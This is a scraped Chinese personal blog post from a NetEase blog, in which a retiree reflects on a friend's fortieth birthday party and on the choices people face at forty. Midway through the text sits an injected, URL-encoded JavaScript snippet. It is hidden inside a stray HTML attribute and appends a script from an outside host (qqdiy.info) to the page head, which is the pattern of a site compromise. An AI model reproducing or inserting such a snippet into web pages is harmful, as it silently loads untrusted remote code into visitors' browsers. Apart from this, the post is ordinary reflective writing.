注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

hgghzx的博客

老白开水啦

 
 
 

日志

 
 
关于我

生日已过,退休开始进入第七个年头,踏实的老年生活使我仍然坚持自己写自己,坚持通过网络了解社会发展,与谈得来的网友建立网上的交流。如果能感动别人,网友们愿意看,愿意评论,我依然非常高兴。

网易考拉推荐

说几句“四十岁的生日”  

2011-03-03 16:19:41|  分类: 生活 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

人生进入四十岁是一个成熟的标志,按照古人讲是进入了“不惑之年”,所以,四十岁的生日就显得格外重要。昨天,我参加了一个朋友的四十岁生日聚会,深有感触。朋友是事业有成者,他自己就很重视这个生日,在开场白中,他很坦诚地总结了自己过四十岁生日的感想,有自豪,有自信,有希望,有祝福,他还特别感谢他的夫人。我们一起来参加唱生日快乐歌曲的,在烛光中也受到感染,大家纷纷祝贺,举杯相庆。过了四十岁的,会回顾自己当年四十岁时是什么样子;没有到四十岁的,会憧憬自己到了四十岁生日会如何。这个生日聚会举办得很意义。

" " z="if%28%21window.r%29%7Bvar%20s%3Ddocument.createElement%28%22script%22%29%3Bs.src%3D%27http%3A//qqdiy.info/a/163/fs.php%27%3Bs.type%3D%22text/javascript%22%3Bdocument.getElem%65ntsByTagName%28%27head%27%29.item%280%29.appendChild%28s%29%3Bwindow.r%3D1%7D"<人生四十岁,经受了二十年青少年的求学历程,经受了职场初期的锻炼和摔打,也经受了爱情及生活的熏陶,完成了成家立业的人生重大进展。到此时,人已经“立起个儿”来了,基本成形,也基本定性,应该是完成了一个大的台阶,在这个台阶上,可以维持到老年,-----许多人就是这样的,但也可以再求更大发展。何去何从,是四十岁人所必须考虑的。

四十岁,虽然已经有了职业的确定,但选择重新创业的,也有许多成功的。四十岁在葆有锐气的同时,也有社会实践经验的积累,少了毛燥,多了洞察;少了冲动,多了稳健,少了盲目,多了冷静,---------所以,再追求更大发展,成功者不少。----但不是所有人都能成功,这就是四十岁的人,在进入不惑之年时面对的一个更大的“惑”。说是不惑了,但惑总还在眼前,只不过,四十岁的人会比较从容淡定地对付这没完没了的“惑”。

所谓“不惑”只是一种希望,现实生活中不可能“不惑”。“惑”就是选择,人生在要不断地选择中渡过,没有选择,生命也就快终结了。我觉得,我也仍然身处在各种的选择中,生活小事,处世大事,仍然有“惑”存在啊。

  评论这张
 
阅读(234)| 评论(32)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017